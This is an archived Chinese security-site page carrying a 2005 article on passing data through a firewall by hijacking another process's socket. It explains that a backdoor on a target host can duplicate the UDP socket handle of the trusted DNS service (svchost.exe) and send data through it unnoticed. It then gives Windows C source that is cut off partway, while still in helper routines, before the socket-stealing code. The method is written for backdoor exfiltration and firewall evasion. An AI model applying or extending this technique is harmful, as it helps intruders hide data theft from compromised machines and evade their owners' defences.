📄 一种新的穿透防火墙的数据传输技术.htm
字号:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>一种新的穿透防火墙的数据传输技术 </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography," />
<link rel="stylesheet" href="../../css/plone.css" type="text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<div class="top">
<div class="searchBox">
<form name="searchform" action="http://www.google.com/search" method="get">
<input type="hidden" name="domains" value="www.xfocus.net">
<input type="hidden" name="sitesearch" value="www.xfocus.net">
<input type="text" name="q" size="20">
<input type="submit" name="btnG" value="Google Search">
</form>
</div>
<img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo">
<img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title">
</div>
<div class="tabs">
<a href="../../index.html" class="plain">首页</a>
<a href="../../releases/index.html" class="plain">焦点原创</a>
<a href="../../articles/index.html" class="selected">安全文摘</a>
<a href="../../tools/index.html" class="plain">安全工具</a>
<a href="../../vuls/index.html" class="plain">安全漏洞</a>
<a href="../../projects/index.html" class="plain">焦点项目</a>
<a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">焦点论坛</a>
<a href="../../about/index.html" class="plain">关于我们</a>
</div>
<div class="personalBar">
<a href='https://www.xfocus.net/php/add_article.php'>添加文章</a> <a href='http://www.xfocus.org/'>English Version</a>
</div>
<table class="columns">
<tr>
<td class="left">
<div class="box">
<h5> 文章分类 </h5>
<div class="body">
<div class="content odd">
<div style="white-space: nowrap;">
<img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/4.html'>专题文章</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/2.html'>漏洞分析</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/3.html'>安全配置</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/1.html'>黑客教学</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/5.html'><b>编程技术 <<</b></a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/7.html'>工具介绍</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/6.html'>火墙技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/8.html'>入侵检测</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/9.html'>破解专题</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/11.html'>焦点公告</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/12.html'>焦点峰会</a><br>
</div>
</div>
</div>
</div>
<div class="box">
<h5> 文章推荐 </h5>
<div class="body">
<div class="content odd">
<img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200408/733.html'>补丁管理最佳安全实践之资产评估</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200404/689.html'>国内网络安全风险评估市场与技术操作</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200410/743.html'>协作的信息系统风险评估</a><br>
</div>
</div>
</div>
</td>
<td class="main">
<h1>一种新的穿透防火墙的数据传输技术</h1><br>创建时间:2005-04-13 更新时间:2005-04-13<br>文章属性:原创<br>文章提交:<a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=35303'>suei8423</a> (suei8423_at_163.com)<br><br>一种新的穿透防火墙的数据传输技术<br />
<br />
Author : ZwelL<br />
Email : zwell@sohu.com<br />
Date : 2005.4.12<br />
<br />
使用该技术背景:<br />
在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况"严重"不推荐使用该技术(后面我会讲到为什么).<br />
<br />
针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.<br />
相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单:<br />
将其他进程中允许数据传输的套接字句柄拿为已用.过程如下:<br />
<br />
1. 找出目标进程<br />
2. 找出SOCKET句柄<br />
2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用.<br />
3. 用转换后的SOCKET进行数据传输<br />
<br />
上面的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论).而且从上面的实现方法也<br />
可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP.<br />
针对不同系统不同进程我们很难定位一个稳定的进程SOCKET.<br />
<br />
看到上面这些,你有点丧气了对不对,哈哈. 再想一想,其实我们有一条真正的通罗马的"黄金大道".<br />
<br />
我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS.你能想像域名解析数据都被<br />
拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀...<br />
<br />
下面是通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子.<br />
编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等.<br />
具体解决方法请细看注释部分...<br />
<br />
/*++<br />
<br />
Made By ZwelL<br />
zwell@sohu.com<br />
2005.4.12<br />
--*/<br />
<br />
#include <winsock2.h><br />
#include <stdio.h><br />
#include <wtsapi32.h><br />
<br />
#pragma comment(lib, "ws2_32")<br />
#pragma comment(lib, "wtsapi32")<br />
<br />
#define NT_SUCCESS(status) ((NTSTATUS)(status)>=0)<br />
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)<br />
<br />
typedef LONG NTSTATUS;<br />
<br />
typedef struct _SYSTEM_HANDLE_INFORMATION<br />
{<br />
ULONG ProcessId;<br />
UCHAR ObjectTypeNumber;<br />
UCHAR Flags;<br />
USHORT Handle;<br />
PVOID Object;<br />
ACCESS_MASK GrantedAccess;<br />
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;<br />
<br />
typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);<br />
<br />
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;<br />
<br />
BOOL LocateNtdllEntry ( void )<br />
{<br />
BOOL ret = FALSE;<br />
char NTDLL_DLL[] = "ntdll.dll";<br />
HMODULE ntdll_dll = NULL;<br />
<br />
<br />
if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )<br />
{<br />
printf( "GetModuleHandle() failed");<br />
return( FALSE );<br />
}<br />
if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )<br />
{<br />
goto LocateNtdllEntry_exit;<br />
}<br />
ret = TRUE;<br />
<br />
LocateNtdllEntry_exit:<br />
<br />
if ( FALSE == ret )<br />
{<br />
printf( "GetProcAddress() failed");<br />
}<br />
ntdll_dll = NULL;<br />
return( ret );<br />
}<br />
<br />
<br />
/*++<br />
This routine is used to get a process's username from it's SID<br />
--*/<br />
BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)<br />
{<br />
// sanity checks and default value<br />
if (pUserSid == NULL)<br />
return false;<br />
strcpy(szUserName, "?");<br />
<br />
SID_NAME_USE snu;<br />
TCHAR szUser[_MAX_PATH];<br />
DWORD chUser = _MAX_PATH;<br />
PDWORD pcchUser = &chUser; <br />
TCHAR szDomain[_MAX_PATH];<br />
DWORD chDomain = _MAX_PATH;<br />
PDWORD pcchDomain = &chDomain;<br />
<br />
// Retrieve user name and domain name based on user's SID.<br />
if (<br />
::LookupAccountSid(<br />
NULL, <br />
pUserSid, <br />
szUser, <br />
pcchUser, <br />
szDomain, <br />
pcchDomain, <br />
&snu<br />
)<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -